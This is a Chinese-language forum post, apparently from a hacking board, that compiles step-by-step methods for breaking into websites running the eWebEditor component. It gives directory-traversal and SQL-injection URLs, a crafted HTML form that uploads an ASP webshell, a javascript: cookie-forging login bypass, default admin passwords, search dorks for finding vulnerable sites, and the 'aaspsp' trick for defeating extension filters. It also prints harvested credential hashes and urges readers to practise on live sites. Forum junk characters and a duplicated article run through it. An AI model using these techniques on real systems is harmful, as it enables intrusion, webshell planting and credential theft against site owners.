eWebEditor.asp?id=45&style=standard1 样式调用
) k- B* t3 E/ @! t: J- @" |" |
) I3 e7 F2 ]% T7 Q# L$ M& l% K6 v! ], t! y
/edit/admin_uploadfile.asp?id=14&dir=../../..
3 D; u- D I7 G" ]7 D3 z! f9 x" }可以浏览网站目录 ../自己加或者减5 H( G3 \+ @( B( Q" l6 F) ?1 ^) }
* `1 C: E8 c% L: Y1 L有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞; H3 l% v2 E V0 d- o
简单利用就是% Q9 U; C! m& v
http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
, ^1 Q2 z$ H2 @' ^2 ahttp://www.siqinci.com/ewebedito ... amp;style=full_v200
" M* ]9 |# h4 }; K可以利用nbsi进行猜解,对此进行注入$ M3 O$ c% M# e* i5 p
还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的
# b: C( K4 i* [. o这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下:
) O5 r# P5 b8 z8 u在action下面; }( Q4 q X$ M9 U4 P: x$ Y |: Y
<form action="http://*********/edit/upload.asp?action=save&type=ASA&style=test" method=post name=myform enctype="multipart/form-data">6 U! G6 t* R7 e% b9 D( q: V
<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">
9 f& ^* J& P% B# {<input type="submit" name="uploadfile" value="提交">" T1 }& T; {! V( m; {3 O
<input type=hidden name=originalfile value="">9 v: K, A* q6 D$ r
</form>
! `# r7 z# B+ Q- @4 o. h7 W------------------------------------------------------------------------------------------------------------------------------------------------+ R# J9 _; @6 K0 U+ Q+ [
<input type="submit" name="uploadfile" value="提交"> 放在action后头
$ m0 ]) `# ]- o! w1 ?, \$ z# o4 f,适合用于在ewebeditor后台那个预览那里出来的 比如上传图片那里,有些时候上传页面弹不出来,就可以用upload.asp?action=save&type=ASA&style=test 这个本地来提交,不过这个东西还是要数据库里上传类型有ASA才可以传得上。
, Q R; ^" R/ e4 `
) w: `* S) Y' m/ M$ A3 C
: O5 x9 ]7 [' p/ ~+ |( g; x2 `3 F0 \: B6 s# i
) u* i: V) l8 P; q. u& m4 FEwebeditor最新漏洞及漏洞大全[收集] (图)" ^; x+ |: M# ~4 _) D2 J
本帖最后由 administrator 于 2009-7-7 21:24 编辑) Y2 O# f* b$ W0 t# m/ I
! R" N$ |+ B. y% j, p
以下文章收集转载于网络) N# i# A# p1 d1 Y2 R
#主题描述# ewebeditor 3.8漏洞[php]0 f' K" D. [1 V& e5 o1 O7 k0 Z# C
--------------------------------------------------------------------------------------------
3 K7 W0 W5 g+ _1 ]#内容#' ^ C ?3 F( @: l. X5 h2 w. |
php版ewebeditor 3.8的漏洞, y# i7 p, a+ [
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:
: K, {( J f; ~0 d. W w' b4 R! }1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,
/ X6 ?$ z* \$ _+ |2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了) @7 N# u! u2 C8 p" Q- b/ K) t
3 后面的利用和asp一样,新增样式修改上传,就ok了: u V: I: l* y+ Y7 q
测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)
# y: ^! t: D \aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell
; Q4 [. y( L4 w) g* W$ q8 mjsp的上传漏洞以及那个出了N久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了0 j- z% \$ s4 \- {
--------------------------------------------------------------------------------------------
7 d3 n) z b1 W$ K: Z6 O0 [+ `8 w9 B( Q3 N# R3 f3 l
3 ?+ H6 ?' W; \" H% \5 x
算是比较全面的ewebeditor编辑器的漏洞收集,现在的网站大多数用的都是ewebeditor编辑器,所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。
p9 D. D- r! ^: j9 ^
% G7 p' e' O+ M$ y漏洞更新日期TM: 2009 2 9日 转自zake’S Blog; T; w; U0 W8 O( W( E
ewebeditor最新漏洞。这个程序爆漏洞一般都是直接上传的漏洞,首先在本地搭建一个ASP环境重命名一个木马名字例如:1.gif.asp这样的就OK了
- n4 Y* }, J! S( H; @2 }那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个,目的就是让远程上传。/pic/3/a2009-6-4-7341a1.gif.asp搭建好了 ,在官方的地方执行网络地址
; m1 w; G) l0 k, x2 @/ e7 |1 A. A i
9 T2 V9 P' f2 M+ t, ]; L q
然后确定以后,这里是最关键的一部!
* V! _$ Z4 Q4 D& a T6 p7 p' i这里点了远程上传以后,再提交得到木马地址/ g- X" _8 d$ J
由于官方在图片目录做了限制 导致不能执行ASP脚本而没能拿到WEB权限1 k R% m2 Z5 G- `& C& M
属于安全检测漏洞版本ewebeditor v6.0.07 B7 N- `6 [+ I$ B7 _# w K8 w
2 i2 D. `& `5 Z* Q! t* E- L) P: d. t
以前的ewebeditor漏洞:
; Z+ y6 m. D. t5 P
+ s* G5 m/ |% Zewebeditor注入漏洞, w( V4 n$ V. M7 D& A3 a8 A
/ d6 r6 V2 O4 j" i- A: X+ g
大家都知道ewebeditor编辑器默认的数据库路径db/ewebeditor.mdb
2 P) t2 C, g% Q默认后台地址是admin_login.asp,另外存在遍历目录漏洞,如果是asp后缀的数据库还可以写入一句话2 x! n+ e! O+ a. P- o5 c+ L& t
今天我给大家带来的也是ewebeditor编辑器的入侵方法" ?, ~2 R" X5 @$ a! f/ W
不过一种是注入,一种是利用upload.asp文件,本地构造' m# d7 C. Q& y( u9 N j
NO1:注入
% F; P3 c% s1 D/ L; Z/ M* C8 K2 fhttp://www.XXX.com/ewebeditor200 ... amp;style=full_v200
. U% O1 W, |% ]7 n1 K/ X+ X编辑器ewebedior7以前版本通通存在注入
& i1 [/ ?( v0 i- I' O直接检测不行的,要写入特征字符
o3 b; i. {* @- V7 R( g2 W我们的工具是不知道ewebeditor的表名的还有列名& P* i% x G. x% Q: W0 k. n
我们自己去看看 B8 F( n$ L8 X: O% k; e
哎。。先表吧
- s+ v5 k5 ]- K! T要先添加进库' A9 C" N& o: o. @+ @
开始猜账号密码了
0 E& |8 O% F7 x' T, s我们==1 e. u' f0 X5 y) l
心急的往后拉; l# H+ b% u# Z9 V% B6 }8 E' k
出来了, _' p, J. h0 A5 x/ P% I
[sys_username]:bfb18022a99849f5 chaoup[sys_userpass]:0ed08394302f7d5d 8511200 B; s' }( B0 _9 u/ ?4 f2 E
对吧^_^
! V& z c. X s" f# \9 w后面不说了
7 z9 M: z4 Q, z2 i% Q( n. Z$ jNO2:利用upload.asp文件,本地构造上传shell4 }) _! n" `, X- ?+ C1 v; B8 d
大家看这里
% }& \1 k8 M! D" G3 p6 F2 h' Yhttp://www.siqinci.com/ewebedito ... lepreview&id=37) y) f0 o1 l( c5 [0 n$ D$ b% p u
如果遇见这样的情况又无法添加工具栏是不是很郁闷0 h6 J* z5 Q6 o7 c+ o. }
现在不郁闷了,^_^源源不一般; p* b8 V# l0 k; g# u
我们记录下他的样式名“aaa”
0 U1 G4 J/ |3 R我已经吧upload.asp文件拿出来了
; O. ]% _& |9 ] G4 ]我们构造下
0 f+ Z9 L% q# |OK,我之前已经构造好了& V1 ~( r. Z, d: ?. I& i8 L6 `+ W8 L
其实就是这里
4 e8 X2 V0 V) [7 T) [: C' H<form action=”地址/path/upload.asp?action=save&type=&style=样式名” method=post name=myform enctype=”multipart/form-data”>
2 Q1 W7 ~: w$ o. v<input type=file name=uploadfile size=1 style=”width:100%”>
8 j* Y6 C& p* o; o' d<input type=submit value=”上传了”></input>4 |- p0 a% I; Y) F: k6 |6 b5 j
</form>) {3 |4 X0 L: y$ E% O( J" }$ R
下面我们运行他上传个大马算了; P5 M; p+ w+ W. I( p
UploadFile上传进去的在这个目录下+ L- G% v7 |- C) K7 u
2008102018020762.asa" V) o1 C# l2 C# S f
! N) |% m; N. I) ] P过往漏洞:6 C Y1 Q* j F# A2 }# _. F
2 `7 @; q# Z. ?" c
首先介绍编辑器的一些默认特征:
8 t# |# ]0 Y! t" D7 n5 z0 }4 G默认登陆admin_login.asp
/ R1 S/ G- K! ~1 ~; z默认数据库db/ewebeditor.mdb' u6 r2 H/ n+ e
默认帐号admin 密码admin或admin888
! o% G5 |8 |& s! ~+ i搜索关键字:”inurl:ewebeditor” 关键字十分重要
4 n7 g8 o6 j$ u9 Y; j7 r* ?有人搜索”eWebEditor - eWebSoft在线编辑器”
8 N# @% c3 h3 z' ]. h根本搜索不到几个~
0 m) |6 L% ~8 W8 D$ e1 cbaidu.google搜索inurl:ewebeditor
+ g' l: l# Q8 z2 r4 y. j, G. {# [) p几万的站起码有几千个是具有默认特征的~
/ y5 L/ e* h& B2 S- R1 z' e; m; F% F& z那么试一下默认后台
+ @9 p2 U% O; a% f3 \! Phttp://www.xxx.com.cn/admin/ewebeditor/admin_login.asp8 b# R7 E& `. ?4 I
试默认帐号密码登陆。
% }- ^6 m6 v. K$ x' }利用eWebEditor获得WebShell的步骤大致如下: _( |8 I) H7 V
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
, F3 W% d# G3 [ v2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID=’eWebEditor1′ src=’/edit/ewebeditor.asp?id=content&style=web’ frameborder=0 scrolling=no width=’550′ HEIGHT=’350′></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src=’***’中的“***”,这就是eWebEditor路径。" V8 g/ c4 l& N, P( Z2 P
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
# X) x1 w# ]6 n, }- ?如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!' x5 a, G' `/ r8 ^7 m. M
4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。
( O: Q/ V' }: k+ e$ }3 }: v A然后在上传的文件类型中增加“asa”类型。
( \2 A. j! {" L* u7 H+ J5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。
% W/ E" z1 E( |9 J; U漏洞原理
( n" |. S/ y+ J* K2 l% ]漏洞的利用原理很简单,请看Upload.asp文件:3 z+ i/ z: r9 Q' P1 |7 |! x
任何情况下都不允许上传asp脚本文件
' }6 N l+ N' v* ?sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)
2 a6 c3 L+ `! B因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!( r7 B& \5 E) B6 y3 @
高级应用- W. v$ r' w" l0 p2 P
eWebEditor的漏洞利用还有一些技巧:
" ^- Z- u9 R) X1.使用默认用户名和密码无法登录。
* L5 z! q: P8 B3 j& `请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法破解,那就当自己的运气不好了。, N9 N: y0 j5 d3 ?5 ^% ~, K8 g r
2.加了asa类型后发现还是无法上传。6 {# h$ D& m7 t+ \
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)一句上修改,我就看见过一个站长是这样修改的:0 S8 p! T; t2 z
sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), “ASP”, “”), “CER”, “”), “ASA”, “”), “CDX”, “”), “HTR”, “”)9 c' g& M( Z" a4 X6 e# W
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
" c* ?! h. @! k G" H# q: _1 T3.上传了asp文件后,却发现该目录没有运行脚本的权限。 ` N" L! s3 K
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。
% I# B8 s/ i O) e5 J& b4.已经使用了第2点中的方法,但是asp类型还是无法上传。- F0 M# t2 p1 ]. g3 c1 m- s/ R
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
" ~- h, P1 D! H+ f5 K后记( J% l3 C5 w; B n) m U7 U
根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!
, j# o. Y/ H& w6 R6 Q基本入侵基础漏洞* j7 I1 l+ e" G6 o& \
eWebEditor 漏洞* {& A9 \2 M% N# j
, f1 _$ U6 E% X: d1 B' A各位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦! j- O( s+ C! Y
' Y& g" K* y9 p- O漏洞利用
" D- j) e! n6 {+ k h9 [7 `; ?, Q利用eWebEditor获得WebShell的步骤大致如下:
1 v6 s$ D. a1 _+ e1 g1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
% G$ \ }! U0 C; Z$ [2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID='eWebEditor1' src='/edit/ewebeditor.asp?id=content&style=web' frameborder=0 scrolling=no width='550' HEIGHT='350'></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src='***'中的“***”,这就是eWebEditor路径。
5 S- U" o) J. f& i3 k3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
' b6 p9 G# {# ^! @如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!6 x$ o5 ^- T4 [" F( a
4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。; s( ?5 o1 L* D3 w# V! u. t+ E
9 T+ `9 O! K, }: o, M3 a! v3 f然后在上传的文件类型中增加“asa”类型。( k v4 G& K# |0 H- ]$ ?5 Q
p6 w4 N* I3 x5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。" I$ `5 ?7 r: H ^/ E) m
& \+ G) T {! [' _0 z+ C2 {" V/ ~
1 \2 x) p8 V8 }4 {8 A# d1 }, ~
漏洞原理
% A2 `9 R! K; r% P' J+ F7 F漏洞的利用原理很简单,请看Upload.asp文件:: R6 ~' {2 G6 m& {9 W$ d$ _
任何情况下都不允许上传asp脚本文件
7 M! o1 e/ T3 X4 psAllowExt = replace(UCase(sAllowExt), "ASP", "")
: Z2 y- t) u5 S, ^因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!
. s- P9 m+ T3 T, I- @: k( h& j, j" K: s+ y- y
高级应用' k) W' l6 W" S9 f' k: |( @; u
eWebEditor的漏洞利用还有一些技巧:
% X, I" F1 f8 K: C* c1.使用默认用户名和密码无法登录。% a; m8 c2 s) z+ x( P8 D
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法****,那就当自己的运气不好了。
# M% @) P M; ^5 F+ `2.加了asa类型后发现还是无法上传。; W* x- ^ f9 X" y, @2 o
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看见过一个站长是这样修改的:
* }" L& R$ k% ?. g7 ZsAllowExt = replace(replace(replace(replace(replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", "")
/ E. e6 _; Z7 z' C7 H猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。! ^( C) X9 I! j7 {, E4 G0 Z; J7 P
3.上传了asp文件后,却发现该目录没有运行脚本的权限。
/ P# L4 S" L9 Y: \2 p" f呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。
3 |& a; g% V& X. w2 m4.已经使用了第2点中的方法,但是asp类型还是无法上传。9 Q- i$ \! B6 ?" ]! x
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
# q1 }- w% U+ H6 V$ L% n: @- l. p8 S0 d* R; w8 P
后记& }; l. j9 t [+ \- t
根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上! |
发表于 2012-9-13 17:00:58
收藏
支持
反对